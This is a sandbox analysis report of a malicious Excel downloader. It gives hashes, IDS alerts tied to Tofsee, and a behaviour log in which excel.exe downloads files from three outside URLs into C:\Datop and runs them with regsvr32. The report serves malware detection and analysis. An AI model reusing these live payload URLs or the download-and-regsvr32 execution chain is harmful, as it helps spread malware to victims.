popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

guide-1763962901.xls

Downloader MSOffice File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 27, 2021, 10:22 a.m. Oct. 27, 2021, 10:30 a.m.
Size 229.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Tue Oct 26 11:04:50 2021, Security: 0
MD5 fc554e84ff0d6cf63628d42218342cf7
SHA256 cc1932d37c2ec7cc9581389087d648d8c13390bff5ad600269a5c18b4fac68b8
CRC32 C6BE0962
ssdeep 6144:DKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgOcfZw6lBVb7oWSuKMA6PujbmvV8Dzz:2ZrlBVbszXjS9t8Dv
Yara
  • Microsoft_Office_File_Downloader_Zero - Microsoft Office File Downloader
  • Microsoft_Office_File_Zero - Microsoft Office File

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49169 -> 198.38.82.168:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49171 -> 103.27.32.22:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49171 -> 103.27.32.22:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49171 -> 103.27.32.22:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 103.27.32.22:443 -> 192.168.56.103:49171 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 103.27.32.22:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 103.27.32.22:443 -> 192.168.56.103:49171 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 103.27.32.22:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 103.27.32.22:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 103.27.32.22:443 -> 192.168.56.103:49174 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 103.27.32.22:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 103.27.32.22:443 -> 192.168.56.103:49174 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 103.27.32.22:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49176 -> 198.38.82.168:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 103.27.32.22:443 -> 192.168.56.103:49172 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 103.27.32.22:443 -> 192.168.56.103:49172 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49169
198.38.82.168:443 		C=US, O=Let's Encrypt, CN=R3 CN=*.giversherbalproducts.com 23:3b:89:a4:b8:b7:80:a5:bd:4b:5a:9e:b1:7b:1c:e9:82:57:a2:87
TLSv1
192.168.56.103:49176
198.38.82.168:443 		C=US, O=Let's Encrypt, CN=R3 CN=denkyiraman.co.uk dc:ee:f4:0d:91:7f:f8:e9:35:0f:f7:e9:dc:0e:2d:e3:c5:4f:a1:e6

request GET http://x1.i.lencr.org/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2496
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bf98000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2496
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b152000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2164
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c471000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2128
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c471000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2860
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c471000
process_handle: 0xffffffff
1 0 0
cmdline regsvr32 C:\Datop\test.test
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\test2.test
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\test1.test
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\test.test
cmdline regsvr32 C:\Datop\test1.test
cmdline regsvr32 C:\Datop\test2.test
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2496
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef71000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

URLDownloadToFileW

 url: https://giversherbalproducts.com/Ad47XRSH/fok.html
stack_pivoted: 0
filepath_r: C:\Datop\test.test
filepath: C:\Datop\test.test
2148270105 0

URLDownloadToFileW

 url: https://specialistedu.com.hk/495ivO4PQTRk/fok.html
stack_pivoted: 0
filepath_r: C:\Datop\test1.test
filepath: C:\Datop\test1.test
2148270085 0

URLDownloadToFileW

 url: https://denkyiraman.co.uk/hqzqxPNha/fok.html
stack_pivoted: 0
filepath_r: C:\Datop\test2.test
filepath: C:\Datop\test2.test
2148270105 0
parent_process excel.exe martian_process regsvr32 C:\Datop\test.test
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\test2.test
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\test1.test
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\test.test
parent_process excel.exe martian_process regsvr32 C:\Datop\test1.test
parent_process excel.exe martian_process regsvr32 C:\Datop\test2.test
file C:\Windows\System32\regsvr32.exe